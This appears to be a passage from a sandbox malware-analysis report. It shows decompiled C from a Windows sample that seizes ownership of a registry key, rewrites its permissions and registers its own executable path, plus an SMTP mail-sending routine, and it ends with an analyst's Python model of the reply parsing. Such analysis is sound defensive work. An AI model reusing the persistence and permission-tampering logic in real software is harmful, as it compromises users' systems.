                                                                                				_t95 = GetUserNameA( &_v388,  &_v40);
                                                                                				__eflags = _t95;
                                                                                				if(_t95 == 0) {
                                                                                					L48:
                                                                                					RegCloseKey(_v28);
                                                                                					return _v12;
                                                                                				} else {
                                                                                					_v36 = 0x44;
                                                                                					_v44 = 0x80;
                                                                                					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
                                                                                					__eflags = _t104;
                                                                                					if(_t104 == 0) {
                                                                                						goto L48;
                                                                                					}
                                                                                					_v48 = 0x400;
                                                                                					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
                                                                                					__eflags = _t107;
                                                                                					if(_t107 != 0) {
                                                                                						goto L48;
                                                                                					}
                                                                                					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
                                                                                					__eflags = _t111;
                                                                                					if(_t111 == 0) {
                                                                                						L12:
                                                                                						_v24 = 0;
                                                                                						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
                                                                                						__eflags = _t116;
                                                                                						if(_t116 == 0) {
                                                                                							L47:
                                                                                							goto L48;
                                                                                						}
                                                                                						_t117 = _v32;
                                                                                						__eflags = _t117;
                                                                                						if(_t117 == 0) {
                                                                                							goto L47;
                                                                                						}
                                                                                						_t164 = 0;
                                                                                						_v8 = 0;
                                                                                						__eflags = 0 - _t117->AceCount;
                                                                                						if(0 >= _t117->AceCount) {
                                                                                							goto L47;
                                                                                						} else {
                                                                                							goto L15;
                                                                                						}
                                                                                						do {
                                                                                							L15:
                                                                                							_t118 = GetAce(_t117, _v8,  &_v20);
                                                                                							__eflags = _t118;
                                                                                							if(_t118 == 0) {
                                                                                								L31:
                                                                                								_t73 =  &_v8;
                                                                                								 *_t73 = _v8 + 1;
                                                                                								__eflags =  *_t73;
                                                                                								goto L32;
                                                                                							}
                                                                                							_t172 = 0;
                                                                                							_v16 = _v20 + 8;
                                                                                							__eflags = _t164;
                                                                                							if(_t164 <= 0) {
                                                                                								L21:
                                                                                								__eflags = _t164 - 0x20;
                                                                                								if(_t164 < 0x20) {
                                                                                									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
                                                                                									_t164 = _t164 + 1;
                                                                                									__eflags = _t164;
                                                                                								}
                                                                                								_t134 = EqualSid( &_v132, _v16);
                                                                                								_t159 = _v20;
                                                                                								__eflags = _t134;
                                                                                								if(_t134 == 0) {
                                                                                									_t135 = 0x20000;
                                                                                								} else {
                                                                                									asm("sbb eax, eax");
                                                                                									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
                                                                                								}
                                                                                								__eflags = _t159[1] - _t135;
                                                                                								if(_t159[1] != _t135) {
                                                                                									_t159[1] = _t135;
                                                                                									_t159 = _v20;
                                                                                									_v24 = 1;
                                                                                								}
                                                                                								__eflags =  *_t159;
                                                                                								if( *_t159 != 0) {
                                                                                									L30:
                                                                                									 *_t159 = 0;
                                                                                									_t136 = _v16;
                                                                                									__eflags =  *(_t136 + 8);
                                                                                									_t68 =  *(_t136 + 8) == 0;
                                                                                									__eflags = _t68;
                                                                                									_v24 = 1;
                                                                                									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
                                                                                									goto L31;
                                                                                								} else {
                                                                                									__eflags = _t159[0] & 0x00000010;
                                                                                									if((_t159[0] & 0x00000010) == 0) {
                                                                                										goto L31;
                                                                                									}
                                                                                									goto L30;
                                                                                								}
                                                                                							} else {
                                                                                								goto L17;
                                                                                							}
                                                                                							while(1) {
                                                                                								L17:
                                                                                								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
                                                                                								__eflags = _t143;
                                                                                								if(_t143 != 0) {
                                                                                									break;
                                                                                								}
                                                                                								_t172 = _t172 + 1;
                                                                                								__eflags = _t172 - _t164;
                                                                                								if(_t172 < _t164) {
                                                                                									continue;
                                                                                								}
                                                                                								break;
                                                                                							}
                                                                                							__eflags = _t172 - _t164;
                                                                                							if(_t172 >= _t164) {
                                                                                								goto L21;
                                                                                							}
                                                                                							DeleteAce(_v32, _v8);
                                                                                							_v24 = 1;
                                                                                							L32:
                                                                                							_t117 = _v32;
                                                                                							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
                                                                                						} while (_v8 < (_t117->AceCount & 0x0000ffff));
                                                                                						__eflags = _v24;
                                                                                						if(_v24 == 0) {
                                                                                							goto L47;
                                                                                						}
                                                                                						__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
                                                                                						if(__eflags == 0) {
                                                                                							L41:
                                                                                							_v12 = 1;
                                                                                							_t173 = LocalAlloc(0x40, 0x14);
                                                                                							__eflags = _t173;
                                                                                							if(_t173 != 0) {
                                                                                								_t120 = InitializeSecurityDescriptor(_t173, 1);
                                                                                								__eflags = _t120;
                                                                                								if(_t120 != 0) {
                                                                                									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
                                                                                									__eflags = _t122;
                                                                                									if(_t122 != 0) {
                                                                                										_t123 = RegSetKeySecurity(_v28, 4, _t173);
                                                                                										__eflags = _t123;
                                                                                										if(_t123 == 0) {
                                                                                											_v12 = 1;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								LocalFree(_t173);
                                                                                							}
                                                                                							goto L47;
                                                                                						}
                                                                                						__eflags =  *0x412cc0; // 0x1
                                                                                						if(__eflags == 0) {
                                                                                							goto L41;
                                                                                						}
                                                                                						_v12 = 0;
                                                                                						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12);
                                                                                						__eflags = _t125;
                                                                                						if(_t125 != 0) {
                                                                                							goto L41;
                                                                                						}
                                                                                						_t158 = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe";
                                                                                						_t126 = _t158;
                                                                                						_t174 =  &(_t126[1]);
                                                                                						do {
                                                                                							_t161 =  *_t126;
                                                                                							_t126 =  &(_t126[1]);
                                                                                							__eflags = _t161;
                                                                                						} while (_t161 != 0);
                                                                                						_t130 = RegSetValueExA(_v12, E00402544(0x4122f8, 0x4106dc, 0xa, 0xe4, 0xc8), 0, 2, _t158, _t126 - _t174 + 1);
                                                                                						__eflags = _t130;
                                                                                						if(_t130 == 0) {
                                                                                							 *0x412cc0 = 0;
                                                                                						}
                                                                                						goto L41;
                                                                                					}
                                                                                					_t146 = EqualSid( &_v132, _v16);
                                                                                					__eflags = _t146;
                                                                                					if(_t146 != 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_v12 = 1;
                                                                                					_t175 = LocalAlloc(0x40, 0x14);
                                                                                					__eflags = _t175;
                                                                                					if(_t175 != 0) {
                                                                                						_t148 = InitializeSecurityDescriptor(_t175, 1);
                                                                                						__eflags = _t148;
                                                                                						if(_t148 != 0) {
                                                                                							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
                                                                                							__eflags = _t151;
                                                                                							if(_t151 != 0) {
                                                                                								RegSetKeySecurity(_v28, 1, _t175);
                                                                                							}
                                                                                						}
                                                                                						LocalFree(_t175);
                                                                                					}
                                                                                					goto L12;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,?,?), ref: 00407B16
                                                                                • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
                                                                                • EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407B8C
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
                                                                                • RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
                                                                                • LocalFree.KERNEL32(00000000), ref: 00407BB2
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$D
                                                                                • API String ID: 2976863881-60433687
                                                                                • Opcode ID: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                • Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
                                                                                • Opcode Fuzzy Hash: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                • Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 57%
                                                                                			E00406511(void* __ecx) {
                                                                                				signed int _t75;
                                                                                				signed int _t76;
                                                                                				int _t78;
                                                                                				void* _t83;
                                                                                				signed int _t93;
                                                                                				void* _t95;
                                                                                				signed int _t99;
                                                                                				int _t101;
                                                                                				int _t115;
                                                                                				int _t117;
                                                                                				void* _t118;
                                                                                				void* _t119;
                                                                                				void* _t120;
                                                                                				void* _t122;
                                                                                				intOrPtr _t135;
                                                                                				intOrPtr* _t137;
                                                                                				void* _t139;
                                                                                				void* _t141;
                                                                                				void* _t143;
                                                                                				void* _t144;
                                                                                				void* _t152;
                                                                                
                                                                                				_t122 = __ecx;
                                                                                				_t139 = _t141 - 0x74;
                                                                                				_t75 =  *(_t139 + 0x7c);
                                                                                				_t135 =  *((intOrPtr*)(_t75 + 4));
                                                                                				_t76 =  *_t75;
                                                                                				 *(_t139 + 0x7c) = _t76;
                                                                                				_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x61, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
                                                                                				_t143 = _t141 - 0x90c + 0x1c;
                                                                                				_t117 = _t78;
                                                                                				if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
                                                                                					E0040E318();
                                                                                					ExitProcess(0);
                                                                                				}
                                                                                				_t83 =  *( *(_t139 + 0x7c) + 0xc);
                                                                                				__imp__#8( *((intOrPtr*)(_t83 + 4)), E00406511);
                                                                                				__imp__#8();
                                                                                				_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
                                                                                				_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
                                                                                				E0040EE2A(_t122, _t139 - 0x98, 0, 0x108);
                                                                                				_t144 = _t143 + 0x48;
                                                                                				 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));
                                                                                				_t93 = 3;
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				 *(_t139 - 0x8c) = _t93;
                                                                                				 *((intOrPtr*)(_t139 - 0x94)) = 0;
                                                                                				_push(0);
                                                                                				 *(_t139 - 0x5c) = _t93;
                                                                                				_push(0);
                                                                                				 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));
                                                                                				 *((intOrPtr*)(_t139 - 0x64)) = 0;
                                                                                				_t130 =  *((intOrPtr*)(_t135 + 0xb4));
                                                                                				 *(_t139 - 0x6c) = _t93;
                                                                                				 *(_t139 + 0x7c) = _t93;
                                                                                				_push(_t135);
                                                                                				_push(_t139 - 0x98);
                                                                                				 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));
                                                                                				 *((intOrPtr*)(_t139 - 0x74)) = 0;
                                                                                				_push(0);
                                                                                				while(1) {
                                                                                					_t95 = GetCurrentProcess();
                                                                                					__imp__StackWalk64(0x14c, _t95);
                                                                                					if(_t95 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t95 = 0;
                                                                                					if( *(_t139 + 0x7c) != 0) {
                                                                                						if( *((intOrPtr*)(_t139 - 0x88)) != 0) {
                                                                                							_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
                                                                                							_t144 = _t144 + 0x1c;
                                                                                							_t119 = _t119 + _t115;
                                                                                							_t95 = 0;
                                                                                						}
                                                                                						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;
                                                                                						_push(_t95);
                                                                                						_push(_t95);
                                                                                						_push(_t95);
                                                                                						_push(_t95);
                                                                                						_push(_t135);
                                                                                						_push(_t139 - 0x98);
                                                                                						_push(_t95);
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				 *(_t139 + 0x7c) = _t95;
                                                                                				_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
                                                                                				 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;
                                                                                				do {
                                                                                					_t137 = 0x412c40 +  *(_t139 + 0x70) * 4;
                                                                                					if( *_t137 != 0) {
                                                                                						_t99 =  *(_t139 + 0x7c) & 0x80000007;
                                                                                						if(_t99 < 0) {
                                                                                							_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
                                                                                						}
                                                                                						if(_t152 == 0) {
                                                                                							_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
                                                                                						}
                                                                                						_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);
                                                                                						_t144 = _t144 + 0x10;
                                                                                						_t120 = _t120 + _t101;
                                                                                						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;
                                                                                					}
                                                                                					 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
                                                                                				} while ( *(_t139 + 0x70) < 0x20);
                                                                                				wsprintfA(_t139 + _t120 - 0x898, "\n");
                                                                                				E0040E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
                                                                                				E0040E318();
                                                                                				return 1;
                                                                                			}
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                • API String ID: 2400214276-165278494
                                                                                • Opcode ID: fbd2438e5a8d786474603689893f321f2aaf39c813a77a2b8649c1733411c7dd
                                                                                • Instruction ID: d0bbb1ce902d37c6012dbda67fcae0275dd4f0eb650f6cdd038f268f1af807dd
                                                                                • Opcode Fuzzy Hash: fbd2438e5a8d786474603689893f321f2aaf39c813a77a2b8649c1733411c7dd
                                                                                • Instruction Fuzzy Hash: FC615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 56%
                                                                                			E0040A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
                                                                                				short _v129;
                                                                                				char _v132;
                                                                                				char _v1156;
                                                                                				signed int _t59;
                                                                                				int _t60;
                                                                                				void* _t61;
                                                                                				char* _t62;
                                                                                				signed int _t63;
                                                                                				void* _t65;
                                                                                				signed int _t68;
                                                                                				signed int _t74;
                                                                                				signed int _t76;
                                                                                				signed int _t78;
                                                                                				signed int _t80;
                                                                                				void* _t82;
                                                                                				signed int _t85;
                                                                                				signed int _t87;
                                                                                				signed int _t92;
                                                                                				void* _t96;
                                                                                				intOrPtr _t102;
                                                                                				signed int _t103;
                                                                                				void* _t104;
                                                                                				int _t121;
                                                                                				intOrPtr _t123;
                                                                                				void* _t124;
                                                                                				CHAR* _t125;
                                                                                				intOrPtr* _t126;
                                                                                				intOrPtr* _t127;
                                                                                				signed int _t129;
                                                                                				void* _t130;
                                                                                				void* _t131;
                                                                                
                                                                                				_t102 = _a8;
                                                                                				_t2 = _t102 - 1; // 0x0
                                                                                				_t59 = _t2;
                                                                                				_t125 =  &_v132;
                                                                                				if(_t59 > 0xb) {
                                                                                					L21:
                                                                                					_t60 = lstrlenA(_t125);
                                                                                					_t121 = _t60;
                                                                                					_t126 = __imp__#19;
                                                                                					_t61 =  *_t126(_a4, _t125, _t121, 0);
                                                                                					if(_t61 == _t121) {
                                                                                						__eflags = _t102 - 6;
                                                                                						if(_t102 != 6) {
                                                                                							L28:
                                                                                							_t127 = __imp__#16;
                                                                                							_t103 = 0;
                                                                                							_push(0);
                                                                                							_v1156 = 0;
                                                                                							_v132 = 0;
                                                                                							_push(0x3f6);
                                                                                							_t62 =  &_v1156;
                                                                                							while(1) {
                                                                                								_t63 =  *_t127(_a4, _t62);
                                                                                								__eflags = _t63;
                                                                                								if(_t63 <= 0) {
                                                                                									break;
                                                                                								}
                                                                                								_t103 = _t103 + _t63;
                                                                                								__eflags = _t103 - 0x1f4;
                                                                                								if(_t103 > 0x1f4) {
                                                                                									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
                                                                                									_push(6);
                                                                                									L72:
                                                                                									_pop(_t65);
                                                                                									return _t65;
                                                                                								}
                                                                                								__eflags = _v132;
                                                                                								 *((char*)(_t130 + _t103 - 0x480)) = 0;
                                                                                								if(_v132 != 0) {
                                                                                									L33:
                                                                                									_t68 = E0040EE95( &_v1156,  &_v132);
                                                                                									__eflags = _t68;
                                                                                									if(_t68 != 0) {
                                                                                										break;
                                                                                									}
                                                                                									L34:
                                                                                									_t92 = 0x3f6 - _t103;
                                                                                									__eflags = _t92;
                                                                                									_push(0);
                                                                                									_push(_t92);
                                                                                									_t62 = _t130 + _t103 - 0x480;
                                                                                									continue;
                                                                                								}
                                                                                								__eflags = _t103 - 3;
                                                                                								if(_t103 <= 3) {
                                                                                									goto L34;
                                                                                								}
                                                                                								E0040EE08( &_v132,  &_v1156, 4);
                                                                                								_t131 = _t131 + 0xc;
                                                                                								__eflags = _v132;
                                                                                								_v129 = 0x20;
                                                                                								if(_v132 == 0) {
                                                                                									goto L34;
                                                                                								}
                                                                                								goto L33;
                                                                                							}
                                                                                							_t123 = _a8;
                                                                                							__eflags = _t123 - 7;
                                                                                							if(_t123 == 7) {
                                                                                								L23:
                                                                                								_push(2);
                                                                                								goto L72;
                                                                                							}
                                                                                							__eflags = _t103 - 5;
                                                                                							if(_t103 <= 5) {
                                                                                								E0040EF00(_a16, "Too small respons\n");
                                                                                							} else {
                                                                                								E0040EE08(_a16,  &_v1156, 0x76);
                                                                                								_t131 = _t131 + 0xc;
                                                                                								_a16[0x76] = 0;
                                                                                							}
                                                                                							__eflags = _t103 - 5;
                                                                                							if(_t103 < 5) {
                                                                                								L71:
                                                                                								E0040EF00(_a16, "Incorrect respons");
                                                                                								_push(7);
                                                                                								goto L72;
                                                                                							} else {
                                                                                								__eflags =  *((char*)(_t130 + _t103 - 0x481)) - 0xa;
                                                                                								if( *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
                                                                                									goto L71;
                                                                                								}
                                                                                								_t104 = E0040EDAC( &_v1156);
                                                                                								__eflags = _t104 - 0xdc;
                                                                                								if(_t104 == 0xdc) {
                                                                                									L50:
                                                                                									_t129 = 1;
                                                                                									_t74 = E0040EE95( &_v1156, "ESMTP");
                                                                                									__eflags = _t74;
                                                                                									_t52 = _t74 != 0;
                                                                                									__eflags = _t52;
                                                                                									 *0x413668 = _t74 & 0xffffff00 | _t52;
                                                                                									_t123 = 1;
                                                                                									L51:
                                                                                									__eflags = _t123 - 0xc;
                                                                                									if(_t123 != 0xc) {
                                                                                										L54:
                                                                                										__eflags = _t129;
                                                                                										if(_t129 != 0) {
                                                                                											goto L23;
                                                                                										}
                                                                                										_t76 =  *0x413630; // 0x0
                                                                                										__eflags = _t76;
                                                                                										if(_t76 == 0) {
                                                                                											L70:
                                                                                											_push(0xb);
                                                                                											goto L72;
                                                                                										}
                                                                                										__eflags =  *0x413634 - _t129; // 0x0
                                                                                										if(__eflags == 0) {
                                                                                											goto L70;
                                                                                										}
                                                                                										__eflags =  *0x413638 - _t129; // 0x0
                                                                                										if(__eflags == 0) {
                                                                                											goto L70;
                                                                                										}
                                                                                										__eflags = _t123 - 4;
                                                                                										if(_t123 != 4) {
                                                                                											L61:
                                                                                											_t78 = E0040A699( &_v1156,  *0x413634);
                                                                                											__eflags = _t78;
                                                                                											if(_t78 == 0) {
                                                                                												_t80 = E0040A699( &_v1156,  *0x413638);
                                                                                												__eflags = _t80;
                                                                                												if(_t80 == 0) {
                                                                                													__eflags = _t123 - 3;
                                                                                													if(_t123 == 3) {
                                                                                														L69:
                                                                                														_t82 = E0040E819(1, "localcfg", "ip", E004030B5());
                                                                                														_push( &_v132);
                                                                                														_t85 = E0040EE95( &_v1156, E0040A7A3(_t82, _t82));
                                                                                														__eflags = _t85;
                                                                                														if(_t85 != 0) {
                                                                                															goto L62;
                                                                                														}
                                                                                														goto L70;
                                                                                													}
                                                                                													__eflags = _t123 - 4;
                                                                                													if(_t123 == 4) {
                                                                                														goto L69;
                                                                                													}
                                                                                													__eflags = _t123 - 5;
                                                                                													if(_t123 == 5) {
                                                                                														goto L69;
                                                                                													}
                                                                                													__eflags = _t123 - 6;
                                                                                													if(_t123 != 6) {
                                                                                														goto L70;
                                                                                													}
                                                                                													goto L69;
                                                                                												}
                                                                                												_push(0xa);
                                                                                												goto L72;
                                                                                											}
                                                                                											L62:
                                                                                											_push(9);
                                                                                											goto L72;
                                                                                										}
                                                                                										_t87 = E0040A699( &_v1156, _t76);
                                                                                										__eflags = _t87;
                                                                                										if(_t87 == 0) {
                                                                                											goto L61;
                                                                                										}
                                                                                										_push(8);
                                                                                										goto L72;
                                                                                									}
                                                                                									__eflags = _t104 - 0x217;
                                                                                									if(_t104 != 0x217) {
                                                                                										goto L54;
                                                                                									}
                                                                                									_push(0xf);
                                                                                									goto L72;
                                                                                								}
                                                                                								__eflags = _t104 - 0xfa;
                                                                                								if(_t104 == 0xfa) {
                                                                                									goto L50;
                                                                                								}
                                                                                								__eflags = _t104 - 0x162;
                                                                                								if(_t104 == 0x162) {
                                                                                									goto L50;
                                                                                								}
                                                                                								__eflags = _t104 - 0xdd;
                                                                                								if(_t104 == 0xdd) {
                                                                                									goto L50;
                                                                                								}
                                                                                								__eflags = _t104 - 0x14e;
                                                                                								if(_t104 == 0x14e) {
                                                                                									goto L50;
                                                                                								}
                                                                                								__eflags = _t104 - 0xeb;
                                                                                								if(_t104 == 0xeb) {
                                                                                									goto L50;
                                                                                								}
                                                                                								_t129 = 0;
                                                                                								goto L51;
                                                                                							}
                                                                                						}
                                                                                						_t124 = 5;
                                                                                						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
                                                                                						__eflags = _t96 - _t124;
                                                                                						if(_t96 == _t124) {
                                                                                							goto L28;
                                                                                						}
                                                                                						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
                                                                                						return _t124;
                                                                                					}
                                                                                					if(_t102 != 7) {
                                                                                						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
                                                                                						_push(5);
                                                                                						goto L72;
                                                                                					}
                                                                                					goto L23;
                                                                                				}
                                                                                				switch( *((intOrPtr*)(_t59 * 4 +  &M0040AB51))) {
                                                                                					case 0:
                                                                                						goto L28;
                                                                                					case 1:
                                                                                						_push(_a12);
                                                                                						_t100 =  &_v132;
                                                                                						if( *0x413668 == 0) {
                                                                                							_push("helo %s\r\n");
                                                                                						} else {
                                                                                							_push("ehlo %s\r\n");
                                                                                						}
                                                                                						goto L4;
                                                                                					case 2:
                                                                                						_push(_a12);
                                                                                						_push("mail from:<%s>\r\n");
                                                                                						goto L14;
                                                                                					case 3:
                                                                                						_push(_a12);
                                                                                						_push("rcpt to:<%s>\r\n");
                                                                                						L14:
                                                                                						__eax =  &_v132;
                                                                                						L4:
                                                                                						wsprintfA(_t100, ??);
                                                                                						goto L20;
                                                                                					case 4:
                                                                                						_push(7);
                                                                                						_push("data\r\n");
                                                                                						goto L19;
                                                                                					case 5:
                                                                                						goto L21;
                                                                                					case 6:
                                                                                						_push(7);
                                                                                						_push("quit\r\n");
                                                                                						goto L19;
                                                                                					case 7:
                                                                                						goto L21;
                                                                                					case 8:
                                                                                						_push(0xd);
                                                                                						_push("AUTH LOGIN\r\n");
                                                                                						L19:
                                                                                						__eax =  &_v132;
                                                                                						_push( &_v132);
                                                                                						__eax = E0040EE08();
                                                                                						goto L20;
                                                                                					case 9:
                                                                                						__eax = _a12;
                                                                                						_t9 = __eax + 1; // 0x1
                                                                                						__edx = _t9;
                                                                                						do {
                                                                                							__cl =  *__eax;
                                                                                							__eax = __eax + 1;
                                                                                							__eflags = __cl;
                                                                                						} while (__cl != 0);
                                                                                						goto L9;
                                                                                					case 0xa:
                                                                                						__eax = _a12;
                                                                                						_t15 = __eax + 1; // 0x1
                                                                                						__edx = _t15;
                                                                                						do {
                                                                                							__cl =  *__eax;
                                                                                							__eax = __eax + 1;
                                                                                							__eflags = __cl;
                                                                                						} while (__cl != 0);
                                                                                						L9:
                                                                                						__eax = __eax - __edx;
                                                                                						 *((char*)(__ebp + __eax - 0x80)) = 0;
                                                                                						L20:
                                                                                						_t131 = _t131 + 0xc;
                                                                                						goto L21;
                                                                                				}
                                                                                			}
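The routine above is the sample's SMTP client step: the switch at the bottom builds one command per state, the recv loop reassembles the server reply (stopping at the first line that carries a `NNN ` prefix, which is how multi-line replies such as an EHLO response end), and the checks after the loop turn the reply code into one of the small integer results pushed before L72. The following Python is an added example that models that logic so an analyst can replay captured replies against it; it is not code from the sample or from the Joe Sandbox report. The helper meanings (E0040EE95 as strstr, E0040EDAC as atoi, E0040EE08 as memcpy, E0040A699 as a substring match), the role of the three globals at 0x413630/34/38 as configured match strings, and the use of `localcfg ip` as the bot's own address are analyst assumptions inferred from the call patterns, not facts the report states. Sample replies in the test are constructed.

```python
# Added example: a model of the SMTP reply handling in the decompiled routine
# above. Not sample or report code. Helper semantics (strstr/atoi/memcpy/
# substring match), the meaning of the globals at 0x413630/34/38 and of
# "localcfg ip" are assumptions inferred from the listing, not confirmed.

RECV_CHUNK = 0x3f6          # bytes requested per recv() in the listing
MAX_REPLY = 0x1f4           # the routine gives up once a reply exceeds 500 bytes
ACCEPTED = {220, 250, 354, 221, 334, 235}   # 0xdc 0xfa 0x162 0xdd 0x14e 0xeb
END_OF_DATA = b"\r\n.\r\n"  # 5-byte terminator sent after the message body

# Return values of the routine (the push/pop pairs before L72); names are mine.
R_OK, R_SEND_FAILED, R_TOO_BIG, R_MALFORMED = 2, 5, 6, 7
R_MATCH_0, R_MATCH_1, R_MATCH_2, R_REJECTED, R_AUTH_FAILED = 8, 9, 10, 11, 15


def command_for(state, arg=b"", esmtp=False):
    """Command bytes built by the switch at the end of the listing.
    States 5, 7, 9 and 10 send a caller-prepared buffer and return None here."""
    if state == 1:
        return (b"ehlo %s\r\n" if esmtp else b"helo %s\r\n") % arg
    if state == 2:
        return b"mail from:<%s>\r\n" % arg
    if state == 3:
        return b"rcpt to:<%s>\r\n" % arg
    return {4: b"data\r\n", 6: b"quit\r\n", 8: b"AUTH LOGIN\r\n"}.get(state)


def atoi(data):
    """C atoi() on the leading digits: b'250-' -> 250, b'hello' -> 0 (assumed)."""
    n = 0
    for c in data:
        if not 48 <= c <= 57:
            break
        n = n * 10 + c - 48
    return n


def read_reply(chunks):
    """Reassemble a reply the way the recv loop does.

    chunks: byte strings as successive recv() calls would return them.
    Returns (result, buffer); result is None when the loop ended normally.
    """
    buf = b""
    last_line_marker = None
    for chunk in chunks:
        if not chunk:                       # recv() returned <= 0
            break
        buf += chunk[:RECV_CHUNK - len(buf)]
        if len(buf) > MAX_REPLY:
            return R_TOO_BIG, buf           # "Too big smtp respons (%d bytes)"
        if last_line_marker is None and len(buf) > 3:
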